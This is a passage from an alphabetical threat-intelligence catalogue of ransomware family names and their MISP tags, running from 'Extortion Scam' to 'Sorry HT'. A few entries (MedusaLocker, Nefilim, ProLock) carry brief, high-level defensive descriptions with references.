The tag is: misp-galaxy:ransomware="Extortion Scam"

Extortion Scam is also known as:

  • Sextortion Scam

Extractor

Ransomware

The tag is: misp-galaxy:ransomware="Extractor"

EyLamo

Ransomware

The tag is: misp-galaxy:ransomware="EyLamo"

EZDZ

Ransomware

The tag is: misp-galaxy:ransomware="EZDZ"

Fabiansomware

Ransomware

The tag is: misp-galaxy:ransomware="Fabiansomware"

Facebook HT

Ransomware

The tag is: misp-galaxy:ransomware="Facebook HT"

Faizal

Ransomware

The tag is: misp-galaxy:ransomware="Faizal"

Fake Cerber

Ransomware

The tag is: misp-galaxy:ransomware="Fake Cerber"

Fake DMA

ransomware

The tag is: misp-galaxy:ransomware="Fake DMA"

FartPlz

ransomware

The tag is: misp-galaxy:ransomware="FartPlz"

FBLocker

ransomware

The tag is: misp-galaxy:ransomware="FBLocker"

FCP

ransomware

The tag is: misp-galaxy:ransomware="FCP"

FCrypt

ransomware

The tag is: misp-galaxy:ransomware="FCrypt"

FCT

ransomware

The tag is: misp-galaxy:ransomware="FCT"

Fenrir

ransomware

The tag is: misp-galaxy:ransomware="Fenrir"

File Ripper

ransomware

The tag is: misp-galaxy:ransomware="File Ripper"

FileFuck

ransomware

The tag is: misp-galaxy:ransomware="FileFuck"

FilesL0cker

ransomware

The tag is: misp-galaxy:ransomware="FilesL0cker"

Final

ransomware

The tag is: misp-galaxy:ransomware="Final"

FindZip

ransomware

The tag is: misp-galaxy:ransomware="FindZip"

Flatcher3

ransomware

The tag is: misp-galaxy:ransomware="Flatcher3"

Fluffy-TAR

ransomware

The tag is: misp-galaxy:ransomware="Fluffy-TAR"

Foxy

ransomware

The tag is: misp-galaxy:ransomware="Foxy"

FreeMe

ransomware

The tag is: misp-galaxy:ransomware="FreeMe"

Freshdesk

ransomware

The tag is: misp-galaxy:ransomware="Freshdesk"

Frog

ransomware

The tag is: misp-galaxy:ransomware="Frog"

FrozrLock

ransomware

The tag is: misp-galaxy:ransomware="FrozrLock"

FRS

ransomware

The tag is: misp-galaxy:ransomware="FRS"

FScrypt

ransomware

The tag is: misp-galaxy:ransomware="FScrypt"

FuckTheSystem

ransomware

The tag is: misp-galaxy:ransomware="FuckTheSystem"

FuxSocy Encryptor

ransomware

The tag is: misp-galaxy:ransomware="FuxSocy Encryptor"

Galacti-Crypter

ransomware

The tag is: misp-galaxy:ransomware="Galacti-Crypter"

GameOver

ransomware

The tag is: misp-galaxy:ransomware="GameOver"

Geminis3

ransomware

The tag is: misp-galaxy:ransomware="Geminis3"

Gendarmerie

ransomware

The tag is: misp-galaxy:ransomware="Gendarmerie"

Genobot

ransomware

The tag is: misp-galaxy:ransomware="Genobot"

GermanWiper

ransomware

The tag is: misp-galaxy:ransomware="GermanWiper"

GhosTEncryptor

ransomware

The tag is: misp-galaxy:ransomware="GhosTEncryptor"

GhostHammer

ransomware

The tag is: misp-galaxy:ransomware="GhostHammer"

Gibberish

ransomware

The tag is: misp-galaxy:ransomware="Gibberish"

Gibon

ransomware

The tag is: misp-galaxy:ransomware="Gibon"

Giyotin

ransomware

The tag is: misp-galaxy:ransomware="Giyotin"

GoCryptoLocker

ransomware

The tag is: misp-galaxy:ransomware="GoCryptoLocker"

Godra

ransomware

The tag is: misp-galaxy:ransomware="Godra"

GoGoogle

ransomware

The tag is: misp-galaxy:ransomware="GoGoogle"

GoHack

ransomware

The tag is: misp-galaxy:ransomware="GoHack"

Golden Axe

ransomware

The tag is: misp-galaxy:ransomware="Golden Axe"

Gomme

ransomware

The tag is: misp-galaxy:ransomware="Gomme"

GonnaCry Ransmware

ransomware

The tag is: misp-galaxy:ransomware="GonnaCry Ransmware"

Goofed HT

ransomware

The tag is: misp-galaxy:ransomware="Goofed HT"

GoRansom POC

ransomware

The tag is: misp-galaxy:ransomware="GoRansom POC"

Gorgon

ransomware

The tag is: misp-galaxy:ransomware="Gorgon"

Gotcha

ransomware

The tag is: misp-galaxy:ransomware="Gotcha"

GottaCry

ransomware

The tag is: misp-galaxy:ransomware="GottaCry"

GPAA

ransomware

The tag is: misp-galaxy:ransomware="GPAA"

GPGQwerty

ransomware

The tag is: misp-galaxy:ransomware="GPGQwerty"

Craftul

ransomware

The tag is: misp-galaxy:ransomware="Craftul"

Greystars

ransomware

The tag is: misp-galaxy:ransomware="Greystars"

GrodexCrypt

ransomware

The tag is: misp-galaxy:ransomware="GrodexCrypt"

GrujaRSorium

ransomware

The tag is: misp-galaxy:ransomware="GrujaRSorium"

Gruxer

ransomware

The tag is: misp-galaxy:ransomware="Gruxer"

GusCrypter

ransomware

The tag is: misp-galaxy:ransomware="GusCrypter"

GX40

ransomware

The tag is: misp-galaxy:ransomware="GX40"

H34rtBl33d

ransomware

The tag is: misp-galaxy:ransomware="H34rtBl33d"

HackdoorCrypt3r

ransomware

The tag is: misp-galaxy:ransomware="HackdoorCrypt3r"

Hades

ransomware

The tag is: misp-galaxy:ransomware="Hades"

Hades has relationships with:

  • similar: misp-galaxy:ransomware="WildFire Locker" with estimative-language:likelihood-probability="likely"

Hakbit

ransomware

The tag is: misp-galaxy:ransomware="Hakbit"

HappyCrypter

ransomware

The tag is: misp-galaxy:ransomware="HappyCrypter"

Haze

ransomware

The tag is: misp-galaxy:ransomware="Haze"

HCrypto

ransomware

The tag is: misp-galaxy:ransomware="HCrypto"

HELP@AUSI

ransomware

The tag is: misp-galaxy:ransomware="HELP@AUSI"

HelpDCFile

ransomware

The tag is: misp-galaxy:ransomware="HelpDCFile"

HelpMe

ransomware

The tag is: misp-galaxy:ransomware="HelpMe"

Hermes837

ransomware

The tag is: misp-galaxy:ransomware="Hermes837"

HermesVirus HT

ransomware

The tag is: misp-galaxy:ransomware="HermesVirus HT"

Heropoint

ransomware

The tag is: misp-galaxy:ransomware="Heropoint"

HiddenBeer

ransomware

The tag is: misp-galaxy:ransomware="HiddenBeer"

Honor

ransomware

The tag is: misp-galaxy:ransomware="Honor"

Horros

ransomware

The tag is: misp-galaxy:ransomware="Horros"

Hydra

ransomware

The tag is: misp-galaxy:ransomware="Hydra"

Hydra has relationships with:

  • similar: misp-galaxy:ransomware="Bianlian" with estimative-language:likelihood-probability="likely"

IGotYou

ransomware

The tag is: misp-galaxy:ransomware="IGotYou"

iGZa4C

ransomware

The tag is: misp-galaxy:ransomware="iGZa4C"

ILElection2020

ransomware

The tag is: misp-galaxy:ransomware="ILElection2020"

Ims00ry

ransomware

The tag is: misp-galaxy:ransomware="Ims00ry"

ImSorry

ransomware

The tag is: misp-galaxy:ransomware="ImSorry"

Incanto

ransomware

The tag is: misp-galaxy:ransomware="Incanto"

Indrik

ransomware

The tag is: misp-galaxy:ransomware="Indrik"

InducVirus

ransomware

The tag is: misp-galaxy:ransomware="InducVirus"

InfinityLock

ransomware

The tag is: misp-galaxy:ransomware="InfinityLock"

InfoDot

ransomware

The tag is: misp-galaxy:ransomware="InfoDot"

INPIVX

ransomware

The tag is: misp-galaxy:ransomware="INPIVX"

InsaneCrypt

ransomware

The tag is: misp-galaxy:ransomware="InsaneCrypt"

IPA

ransomware

The tag is: misp-galaxy:ransomware="IPA"

IT.Books

ransomware

The tag is: misp-galaxy:ransomware="IT.Books"

J-

ransomware

The tag is: misp-galaxy:ransomware="J-"

JabaCrypter

ransomware

The tag is: misp-galaxy:ransomware="JabaCrypter"

Jaffe

ransomware

The tag is: misp-galaxy:ransomware="Jaffe"

James

ransomware

The tag is: misp-galaxy:ransomware="James"

Java NotDharma

ransomware

The tag is: misp-galaxy:ransomware="Java NotDharma"

jCandy

ransomware

The tag is: misp-galaxy:ransomware="jCandy"

JeepersCrypt

ransomware

The tag is: misp-galaxy:ransomware="JeepersCrypt"

Jemd

ransomware

The tag is: misp-galaxy:ransomware="Jemd"

JesusCrypt

ransomware

The tag is: misp-galaxy:ransomware="JesusCrypt"

JNEC.a

ransomware

The tag is: misp-galaxy:ransomware="JNEC.a"

JoeGo

ransomware

The tag is: misp-galaxy:ransomware="JoeGo"

Jolly Roger

ransomware

The tag is: misp-galaxy:ransomware="Jolly Roger"

JosepCrypt

ransomware

The tag is: misp-galaxy:ransomware="JosepCrypt"

Juwon

ransomware

The tag is: misp-galaxy:ransomware="Juwon"

Kali

ransomware

The tag is: misp-galaxy:ransomware="Kali"

Kamil

ransomware

The tag is: misp-galaxy:ransomware="Kamil"

Kampret

ransomware

The tag is: misp-galaxy:ransomware="Kampret"

Karo

ransomware

The tag is: misp-galaxy:ransomware="Karo"

Katafrank

ransomware

The tag is: misp-galaxy:ransomware="Katafrank"

Katyusha

ransomware

The tag is: misp-galaxy:ransomware="Katyusha"

KCTF Locker

ransomware

The tag is: misp-galaxy:ransomware="KCTF Locker"

KCW

ransomware

The tag is: misp-galaxy:ransomware="KCW"

Kee

ransomware

The tag is: misp-galaxy:ransomware="Kee"

KEKW

ransomware

The tag is: misp-galaxy:ransomware="KEKW"

Kerkoporta

ransomware

The tag is: misp-galaxy:ransomware="Kerkoporta"

KeyMaker

ransomware

The tag is: misp-galaxy:ransomware="KeyMaker"

KillBot_Virus

ransomware

The tag is: misp-galaxy:ransomware="KillBot_Virus"

KillDisk-Dimens

ransomware

The tag is: misp-galaxy:ransomware="KillDisk-Dimens"

KillRabbit

ransomware

The tag is: misp-galaxy:ransomware="KillRabbit"

KillSwitch

ransomware

The tag is: misp-galaxy:ransomware="KillSwitch"

Kindest

ransomware

The tag is: misp-galaxy:ransomware="Kindest"

KKK

ransomware

The tag is: misp-galaxy:ransomware="KKK"

Kovter

ransomware

The tag is: misp-galaxy:ransomware="Kovter"

Kriptovor

ransomware

The tag is: misp-galaxy:ransomware="Kriptovor"

Krypte

ransomware

The tag is: misp-galaxy:ransomware="Krypte"

Krypton

ransomware

The tag is: misp-galaxy:ransomware="Krypton"

Kryptonite RBY

ransomware

The tag is: misp-galaxy:ransomware="Kryptonite RBY"

Kryptonite Snake

ransomware

The tag is: misp-galaxy:ransomware="Kryptonite Snake"

Kupidon

ransomware

The tag is: misp-galaxy:ransomware="Kupidon"

Ladon

ransomware

The tag is: misp-galaxy:ransomware="Ladon"

Lalabitch_ransomware

ransomware

The tag is: misp-galaxy:ransomware="Lalabitch_ransomware"

LazagneCrypt

ransomware

The tag is: misp-galaxy:ransomware="LazagneCrypt"

Light

ransomware

The tag is: misp-galaxy:ransomware="Light"

LightningCrypt

ransomware

The tag is: misp-galaxy:ransomware="LightningCrypt"

LIGMA

ransomware

The tag is: misp-galaxy:ransomware="LIGMA"

Lime

ransomware

The tag is: misp-galaxy:ransomware="Lime"

Litra

ransomware

The tag is: misp-galaxy:ransomware="Litra"

LittleFinger

ransomware

The tag is: misp-galaxy:ransomware="LittleFinger"

LMAOxUS

ransomware

The tag is: misp-galaxy:ransomware="LMAOxUS"

LockBox

ransomware

The tag is: misp-galaxy:ransomware="LockBox"

Locked_File

ransomware

The tag is: misp-galaxy:ransomware="Locked_File"

LockedByte

ransomware

The tag is: misp-galaxy:ransomware="LockedByte"

Locker-Pay

ransomware

The tag is: misp-galaxy:ransomware="Locker-Pay"

Lockify

ransomware

The tag is: misp-galaxy:ransomware="Lockify"

LockMe

ransomware

The tag is: misp-galaxy:ransomware="LockMe"

LockOn

ransomware

The tag is: misp-galaxy:ransomware="LockOn"

Lockout

ransomware

The tag is: misp-galaxy:ransomware="Lockout"

LongTermMemoryLoss

ransomware

The tag is: misp-galaxy:ransomware="LongTermMemoryLoss"

LonleyCrypt

ransomware

The tag is: misp-galaxy:ransomware="LonleyCrypt"

LooCipher

ransomware

The tag is: misp-galaxy:ransomware="LooCipher"

LordOfShadow

ransomware

The tag is: misp-galaxy:ransomware="LordOfShadow"

Losers

ransomware

The tag is: misp-galaxy:ransomware="Losers"

Losers-Dangerous

ransomware

The tag is: misp-galaxy:ransomware="Losers-Dangerous"

Lost_Files

ransomware

The tag is: misp-galaxy:ransomware="Lost_Files"

LuckyJoe

ransomware

The tag is: misp-galaxy:ransomware="LuckyJoe"

Luxnut

ransomware

The tag is: misp-galaxy:ransomware="Luxnut"

Madafakah

ransomware

The tag is: misp-galaxy:ransomware="Madafakah"

MadBit

ransomware

The tag is: misp-galaxy:ransomware="MadBit"

Magician

ransomware

The tag is: misp-galaxy:ransomware="Magician"

Malabu

ransomware

The tag is: misp-galaxy:ransomware="Malabu"

MalwareTech’s CTF

ransomware

The tag is: misp-galaxy:ransomware="MalwareTech’s CTF"

Mancros+AI4939

ransomware

The tag is: misp-galaxy:ransomware="Mancros+AI4939"

Maoloa

ransomware

The tag is: misp-galaxy:ransomware="Maoloa"

Marozka

ransomware

The tag is: misp-galaxy:ransomware="Marozka"

MarraCrypt

ransomware

The tag is: misp-galaxy:ransomware="MarraCrypt"

Matroska

ransomware

The tag is: misp-galaxy:ransomware="Matroska"

MauriGo

ransomware

The tag is: misp-galaxy:ransomware="MauriGo"

MaxiCrypt

ransomware

The tag is: misp-galaxy:ransomware="MaxiCrypt"

Maykolin

ransomware

The tag is: misp-galaxy:ransomware="Maykolin"

Maysomware

ransomware

The tag is: misp-galaxy:ransomware="Maysomware"

MBR-ONI

ransomware

The tag is: misp-galaxy:ransomware="MBR-ONI"

MedusaLocker

Observed as recently as May 2022, MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims’ networks. The MedusaLocker actors encrypt the victim’s data and leave a ransom note with communication instructions in every folder containing an encrypted file. The note directs victims to provide ransomware payments to a specific Bitcoin wallet address. MedusaLocker appears to operate as a Ransomware-as-a-Service (RaaS) model based on the observed split of ransom payments. Typical RaaS models involve the ransomware developer and various affiliates that deploy the ransomware on victim systems. MedusaLocker ransomware payments appear to be consistently split between the affiliate, who receives 55 to 60 percent of the ransom; and the developer, who receives the remainder.

The tag is: misp-galaxy:ransomware="MedusaLocker"

Table 8584. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-181a

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf

Meduza

ransomware

The tag is: misp-galaxy:ransomware="Meduza"

MegaLocker

ransomware

The tag is: misp-galaxy:ransomware="MegaLocker"

Mew767

ransomware

The tag is: misp-galaxy:ransomware="Mew767"

Mike NotSTOP

ransomware

The tag is: misp-galaxy:ransomware="Mike NotSTOP"

Mikoyan

ransomware

The tag is: misp-galaxy:ransomware="Mikoyan"

MindLost

ransomware

The tag is: misp-galaxy:ransomware="MindLost"

MindSystem

ransomware

The tag is: misp-galaxy:ransomware="MindSystem"

Mini

ransomware

The tag is: misp-galaxy:ransomware="Mini"

Minotaur

ransomware

The tag is: misp-galaxy:ransomware="Minotaur"

MMM

ransomware

The tag is: misp-galaxy:ransomware="MMM"

MNS CryptoLocker

ransomware

The tag is: misp-galaxy:ransomware="MNS CryptoLocker"

MoneroPay

ransomware

The tag is: misp-galaxy:ransomware="MoneroPay"

MongoLock

ransomware

The tag is: misp-galaxy:ransomware="MongoLock"

MoonCryptor

ransomware

The tag is: misp-galaxy:ransomware="MoonCryptor"

Mordor

ransomware

The tag is: misp-galaxy:ransomware="Mordor"

MorrisBatchCrypt

ransomware

The tag is: misp-galaxy:ransomware="MorrisBatchCrypt"

Moth

ransomware

The tag is: misp-galaxy:ransomware="Moth"

MoWare H.F.D

ransomware

The tag is: misp-galaxy:ransomware="MoWare H.F.D"

Mr.Locker

ransomware

The tag is: misp-galaxy:ransomware="Mr.Locker"

Mr403Forbidden

ransomware

The tag is: misp-galaxy:ransomware="Mr403Forbidden"

MuchLove

ransomware

The tag is: misp-galaxy:ransomware="MuchLove"

Muhstik

ransomware

The tag is: misp-galaxy:ransomware="Muhstik"

Mystic

ransomware

The tag is: misp-galaxy:ransomware="Mystic"

MZP

ransomware

The tag is: misp-galaxy:ransomware="MZP"

N2019cov

ransomware

The tag is: misp-galaxy:ransomware="N2019cov"

Naampa

ransomware

The tag is: misp-galaxy:ransomware="Naampa"

NazCrypt

ransomware

The tag is: misp-galaxy:ransomware="NazCrypt"

Nefilim

According to Vitali Kremez and Michael Gillespie, this ransomware shares much code with Nemty 2.5. A difference is removal of the RaaS component, which was switched to email communications for payments. Uses AES-128, which is then protected RSA2048.

The tag is: misp-galaxy:ransomware="Nefilim"

Nefilim has relationships with:

  • related-to: misp-galaxy:ransomware="Nemty" with estimative-language:likelihood-probability="likely"

Negozl

ransomware

The tag is: misp-galaxy:ransomware="Negozl"

Neitrino

ransomware

The tag is: misp-galaxy:ransomware="Neitrino"

NewWave

ransomware

The tag is: misp-galaxy:ransomware="NewWave"

NextCry

ransomware

The tag is: misp-galaxy:ransomware="NextCry"

Nightmare

ransomware

The tag is: misp-galaxy:ransomware="Nightmare"

NinjaLoc

ransomware

The tag is: misp-galaxy:ransomware="NinjaLoc"

NM4

ransomware

The tag is: misp-galaxy:ransomware="NM4"

Noblis

ransomware

The tag is: misp-galaxy:ransomware="Noblis"

Nog4yH4n

ransomware

The tag is: misp-galaxy:ransomware="Nog4yH4n"

Nomikon

ransomware

The tag is: misp-galaxy:ransomware="Nomikon"

NotAHero

ransomware

The tag is: misp-galaxy:ransomware="NotAHero"

Nozelesn

ransomware

The tag is: misp-galaxy:ransomware="Nozelesn"

Nulltica

ransomware

The tag is: misp-galaxy:ransomware="Nulltica"

Nx / OSR

ransomware

The tag is: misp-galaxy:ransomware="Nx / OSR"

Nyton

ransomware

The tag is: misp-galaxy:ransomware="Nyton"

NZMR

ransomware

The tag is: misp-galaxy:ransomware="NZMR"

Ogre

ransomware

The tag is: misp-galaxy:ransomware="Ogre"

OhNo!

ransomware

The tag is: misp-galaxy:ransomware="OhNo!"

Oled

ransomware

The tag is: misp-galaxy:ransomware="Oled"

OmniSphere

ransomware

The tag is: misp-galaxy:ransomware="OmniSphere"

One

ransomware

The tag is: misp-galaxy:ransomware="One"

ONI

ransomware

The tag is: misp-galaxy:ransomware="ONI"

OoPS Ramenware

ransomware

The tag is: misp-galaxy:ransomware="OoPS Ramenware"

OopsLocker

ransomware

The tag is: misp-galaxy:ransomware="OopsLocker"

OPdailyallowance

ransomware

The tag is: misp-galaxy:ransomware="OPdailyallowance"

OpenToYou

ransomware

The tag is: misp-galaxy:ransomware="OpenToYou"

Ordinal

ransomware

The tag is: misp-galaxy:ransomware="Ordinal"

Ordinypt

ransomware

The tag is: misp-galaxy:ransomware="Ordinypt"

Pacman

ransomware

The tag is: misp-galaxy:ransomware="Pacman"

PassLock

ransomware

The tag is: misp-galaxy:ransomware="PassLock"

Pay-or-Lost

ransomware

The tag is: misp-galaxy:ransomware="Pay-or-Lost"

PayForNature

ransomware

The tag is: misp-galaxy:ransomware="PayForNature"

Paymen45

ransomware

The tag is: misp-galaxy:ransomware="Paymen45"

Payment

ransomware

The tag is: misp-galaxy:ransomware="Payment"

PClock и PClock2

ransomware

The tag is: misp-galaxy:ransomware="PClock и PClock2"

PPDDDP

ransomware

The tag is: misp-galaxy:ransomware="PPDDDP"

PEC 2017

ransomware

The tag is: misp-galaxy:ransomware="PEC 2017"

Pendor

ransomware

The tag is: misp-galaxy:ransomware="Pendor"

Pennywise

ransomware

The tag is: misp-galaxy:ransomware="Pennywise"

PewCrypt +decrypt

ransomware

The tag is: misp-galaxy:ransomware="PewCrypt +decrypt"

PewDiePie

ransomware

The tag is: misp-galaxy:ransomware="PewDiePie"

PhobosImposter

ransomware

The tag is: misp-galaxy:ransomware="PhobosImposter"

PhoneNumber

ransomware

The tag is: misp-galaxy:ransomware="PhoneNumber"

PHP

ransomware

The tag is: misp-galaxy:ransomware="PHP"

Pirateware

ransomware

The tag is: misp-galaxy:ransomware="Pirateware"

PoisonFang

ransomware

The tag is: misp-galaxy:ransomware="PoisonFang"

PonyFinal

ransomware

The tag is: misp-galaxy:ransomware="PonyFinal"

PooleZoor

ransomware

The tag is: misp-galaxy:ransomware="PooleZoor"

PopCornTime

ransomware

The tag is: misp-galaxy:ransomware="PopCornTime"

PowerHentai

ransomware

The tag is: misp-galaxy:ransomware="PowerHentai"

PowerLocky

ransomware

The tag is: misp-galaxy:ransomware="PowerLocky"

PowerShell Locker 2013

ransomware

The tag is: misp-galaxy:ransomware="PowerShell Locker 2013"

PowerShell Locker 2015

ransomware

The tag is: misp-galaxy:ransomware="PowerShell Locker 2015"

Pr0tector

ransomware

The tag is: misp-galaxy:ransomware="Pr0tector"

Predator

ransomware

The tag is: misp-galaxy:ransomware="Predator"

Priapos

ransomware

The tag is: misp-galaxy:ransomware="Priapos"

Project23

ransomware

The tag is: misp-galaxy:ransomware="Project23"

Project57

ransomware

The tag is: misp-galaxy:ransomware="Project57"

ProLock

PwndLocker is a ransomware that was observed in late 2019 and is reported to have been used to target businesses and local governments/cities. According to one source, ransom amounts demanded as part of PwndLocker activity range from $175k USD to $650k USD depending on the size of the network. PwndLocker attempts to disable a variety of Windows services so that their data can be encrypted. Various processes will also be targeted, such as web browsers and software related to security, backups, and databases. Shadow copies are cleared by the ransomware, and encryption of files occurs once the system has been prepared in this way. Executable files and those that are likely to be important for the system to continue to function appear to be skipped by the ransomware, and a large number of folders mostly related to Microsoft Windows system files are also ignored. As of March 2020, encrypted files have been observed with the added extensions of .key and .pwnd. Ransom notes are dropped in folders where encrypted files are found and also on the user’s desktop.

The tag is: misp-galaxy:ransomware="ProLock"

ProLock has relationships with:

  • dropped-by: misp-galaxy:botnet="Qbot" with estimative-language:likelihood-probability="likely"

Prometey

ransomware

The tag is: misp-galaxy:ransomware="Prometey"

Protected

ransomware

The tag is: misp-galaxy:ransomware="Protected"

PSCrypt

ransomware

The tag is: misp-galaxy:ransomware="PSCrypt"

PshCrypt

ransomware

The tag is: misp-galaxy:ransomware="PshCrypt"

PTP

ransomware

The tag is: misp-galaxy:ransomware="PTP"

Pulpy

ransomware

The tag is: misp-galaxy:ransomware="Pulpy"

PureLocker

ransomware

The tag is: misp-galaxy:ransomware="PureLocker"

PwndLocker

ransomware

The tag is: misp-galaxy:ransomware="PwndLocker"

PyteHole

ransomware

The tag is: misp-galaxy:ransomware="PyteHole"

Python

ransomware

The tag is: misp-galaxy:ransomware="Python"

PZDC

ransomware

The tag is: misp-galaxy:ransomware="PZDC"

Qinynore

ransomware

The tag is: misp-galaxy:ransomware="Qinynore"

QNAPCrypt

ransomware

The tag is: misp-galaxy:ransomware="QNAPCrypt"

QP

ransomware

The tag is: misp-galaxy:ransomware="QP"

QuakeWay

ransomware

The tag is: misp-galaxy:ransomware="QuakeWay"

Qweuirtksd

ransomware

The tag is: misp-galaxy:ransomware="Qweuirtksd"

R3store

ransomware

The tag is: misp-galaxy:ransomware="R3store"

RabbitFox

ransomware

The tag is: misp-galaxy:ransomware="RabbitFox"

Ramsey

ransomware

The tag is: misp-galaxy:ransomware="Ramsey"

RandomLocker

ransomware

The tag is: misp-galaxy:ransomware="RandomLocker"

RanRans

ransomware

The tag is: misp-galaxy:ransomware="RanRans"

Rans0mLocked

ransomware

The tag is: misp-galaxy:ransomware="Rans0mLocked"

Ransed

ransomware

The tag is: misp-galaxy:ransomware="Ransed"

Ransom102

ransomware

The tag is: misp-galaxy:ransomware="Ransom102"

RansomAES

ransomware

The tag is: misp-galaxy:ransomware="RansomAES"

RansomCuck

ransomware

The tag is: misp-galaxy:ransomware="RansomCuck"

RansomMine

ransomware

The tag is: misp-galaxy:ransomware="RansomMine"

Ransomnix

ransomware

The tag is: misp-galaxy:ransomware="Ransomnix"

Ransom Prank

ransomware

The tag is: misp-galaxy:ransomware="Ransom Prank"

RansomUserLocker

ransomware

The tag is: misp-galaxy:ransomware="RansomUserLocker"

RansomWarrior

ransomware

The tag is: misp-galaxy:ransomware="RansomWarrior"

Rapid

ransomware

The tag is: misp-galaxy:ransomware="Rapid"

Rapid 2.0

ransomware

The tag is: misp-galaxy:ransomware="Rapid 2.0"

Rapid 3.0

ransomware

The tag is: misp-galaxy:ransomware="Rapid 3.0"

Rapid-Gillette

ransomware

The tag is: misp-galaxy:ransomware="Rapid-Gillette"

Ra

ransomware

The tag is: misp-galaxy:ransomware="Ra"

RaRuCrypt

ransomware

The tag is: misp-galaxy:ransomware="RaRuCrypt"

RedBoot

ransomware

The tag is: misp-galaxy:ransomware="RedBoot"

Redkeeper

ransomware

The tag is: misp-galaxy:ransomware="Redkeeper"

RedFox

ransomware

The tag is: misp-galaxy:ransomware="RedFox"

RedRum

ransomware

The tag is: misp-galaxy:ransomware="RedRum"

Redshot

ransomware

The tag is: misp-galaxy:ransomware="Redshot"

Reetner

ransomware

The tag is: misp-galaxy:ransomware="Reetner"

RekenSom

ransomware

The tag is: misp-galaxy:ransomware="RekenSom"

Relock

ransomware

The tag is: misp-galaxy:ransomware="Relock"

RensenWare

ransomware

The tag is: misp-galaxy:ransomware="RensenWare"

Rentyr

ransomware

The tag is: misp-galaxy:ransomware="Rentyr"

RestoLocker

ransomware

The tag is: misp-galaxy:ransomware="RestoLocker"

Resurrection

ransomware

The tag is: misp-galaxy:ransomware="Resurrection"

Retis

ransomware

The tag is: misp-galaxy:ransomware="Retis"

RetMyData

ransomware

The tag is: misp-galaxy:ransomware="RetMyData"

Revolution

ransomware

The tag is: misp-galaxy:ransomware="Revolution"

Reyptson

ransomware

The tag is: misp-galaxy:ransomware="Reyptson"

Rhino

ransomware

The tag is: misp-galaxy:ransomware="Rhino"

Rijndael

ransomware

The tag is: misp-galaxy:ransomware="Rijndael"

Rogue HT

ransomware

The tag is: misp-galaxy:ransomware="Rogue HT"

Rontok

ransomware

The tag is: misp-galaxy:ransomware="Rontok"

Rozlok

ransomware

The tag is: misp-galaxy:ransomware="Rozlok"

RSA-NI

ransomware

The tag is: misp-galaxy:ransomware="RSA-NI"

RSA2048Pro

ransomware

The tag is: misp-galaxy:ransomware="RSA2048Pro"

Ruby

ransomware

The tag is: misp-galaxy:ransomware="Ruby"

Rush

ransomware

The tag is: misp-galaxy:ransomware="Rush"

Russenger

ransomware

The tag is: misp-galaxy:ransomware="Russenger"

Russian EDA2

ransomware

The tag is: misp-galaxy:ransomware="Russian EDA2"

SAD

ransomware

The tag is: misp-galaxy:ransomware="SAD"

SadComputer

ransomware

The tag is: misp-galaxy:ransomware="SadComputer"

Sadogo

ransomware

The tag is: misp-galaxy:ransomware="Sadogo"

Salsa

ransomware

The tag is: misp-galaxy:ransomware="Salsa"

Santa Encryptor

ransomware

The tag is: misp-galaxy:ransomware="Santa Encryptor"

Saramat

ransomware

The tag is: misp-galaxy:ransomware="Saramat"

SARansom

ransomware

The tag is: misp-galaxy:ransomware="SARansom"

Satan Cryptor 2.0

ransomware

The tag is: misp-galaxy:ransomware="Satan Cryptor 2.0"

Satan’s Doom Crypter

ransomware

The tag is: misp-galaxy:ransomware="Satan’s Doom Crypter"

SatanCryptor Go

ransomware

The tag is: misp-galaxy:ransomware="SatanCryptor Go"

Saturn

ransomware

The tag is: misp-galaxy:ransomware="Saturn"

Satyr

ransomware

The tag is: misp-galaxy:ransomware="Satyr"

SaveTheQueen

ransomware

The tag is: misp-galaxy:ransomware="SaveTheQueen"

ScammerLocker HT

ransomware

The tag is: misp-galaxy:ransomware="ScammerLocker HT"

ScammerLocker Ph

ransomware

The tag is: misp-galaxy:ransomware="ScammerLocker Ph"

Schwerer

ransomware

The tag is: misp-galaxy:ransomware="Schwerer"

ScorpionLocker

ransomware

The tag is: misp-galaxy:ransomware="ScorpionLocker"

Scrabber

ransomware

The tag is: misp-galaxy:ransomware="Scrabber"

Scroboscope

ransomware

The tag is: misp-galaxy:ransomware="Scroboscope"

SecretSystem

ransomware

The tag is: misp-galaxy:ransomware="SecretSystem"

SecureCryptor

ransomware

The tag is: misp-galaxy:ransomware="SecureCryptor"

SeginChile

ransomware

The tag is: misp-galaxy:ransomware="SeginChile"

SEND.ID.TO

ransomware

The tag is: misp-galaxy:ransomware="SEND.ID.TO"

Seon

ransomware

The tag is: misp-galaxy:ransomware="Seon"

Sepsis

ransomware

The tag is: misp-galaxy:ransomware="Sepsis"

SepSys

ransomware

The tag is: misp-galaxy:ransomware="SepSys"

Shadi

ransomware

The tag is: misp-galaxy:ransomware="Shadi"

ShadowCryptor

ransomware

The tag is: misp-galaxy:ransomware="ShadowCryptor"

ShinigamiLocker

ransomware

The tag is: misp-galaxy:ransomware="ShinigamiLocker"

ShkolotaCrypt

ransomware

The tag is: misp-galaxy:ransomware="ShkolotaCrypt"

Shrug

ransomware

The tag is: misp-galaxy:ransomware="Shrug"

Shutdown57

ransomware

The tag is: misp-galaxy:ransomware="Shutdown57"

ShutUpAndDance

ransomware

The tag is: misp-galaxy:ransomware="ShutUpAndDance"

Sifreli 2017

ransomware

The tag is: misp-galaxy:ransomware="Sifreli 2017"

Sifreli 2019

ransomware

The tag is: misp-galaxy:ransomware="Sifreli 2019"

SifreCozucu

ransomware

The tag is: misp-galaxy:ransomware="SifreCozucu"

SilentSpring

ransomware

The tag is: misp-galaxy:ransomware="SilentSpring"

SintaLocker

ransomware

The tag is: misp-galaxy:ransomware="SintaLocker"

Skull

ransomware

The tag is: misp-galaxy:ransomware="Skull"

Skull HT

ransomware

The tag is: misp-galaxy:ransomware="Skull HT"

SkyStars

ransomware

The tag is: misp-galaxy:ransomware="SkyStars"

SlankCryptor

ransomware

The tag is: misp-galaxy:ransomware="SlankCryptor"

Snake-Ekans

ransomware

The tag is: misp-galaxy:ransomware="Snake-Ekans"

SnakeLocker

ransomware

The tag is: misp-galaxy:ransomware="SnakeLocker"

Snatch

ransomware

The tag is: misp-galaxy:ransomware="Snatch"

SnowPicnic

ransomware

The tag is: misp-galaxy:ransomware="SnowPicnic"

SoFucked

ransomware

The tag is: misp-galaxy:ransomware="SoFucked"

SOLO

ransomware

The tag is: misp-galaxy:ransomware="SOLO"

Somik1

ransomware

The tag is: misp-galaxy:ransomware="Somik1"

Sorry HT

ransomware

The tag is: misp-galaxy:ransomware="Sorry HT"

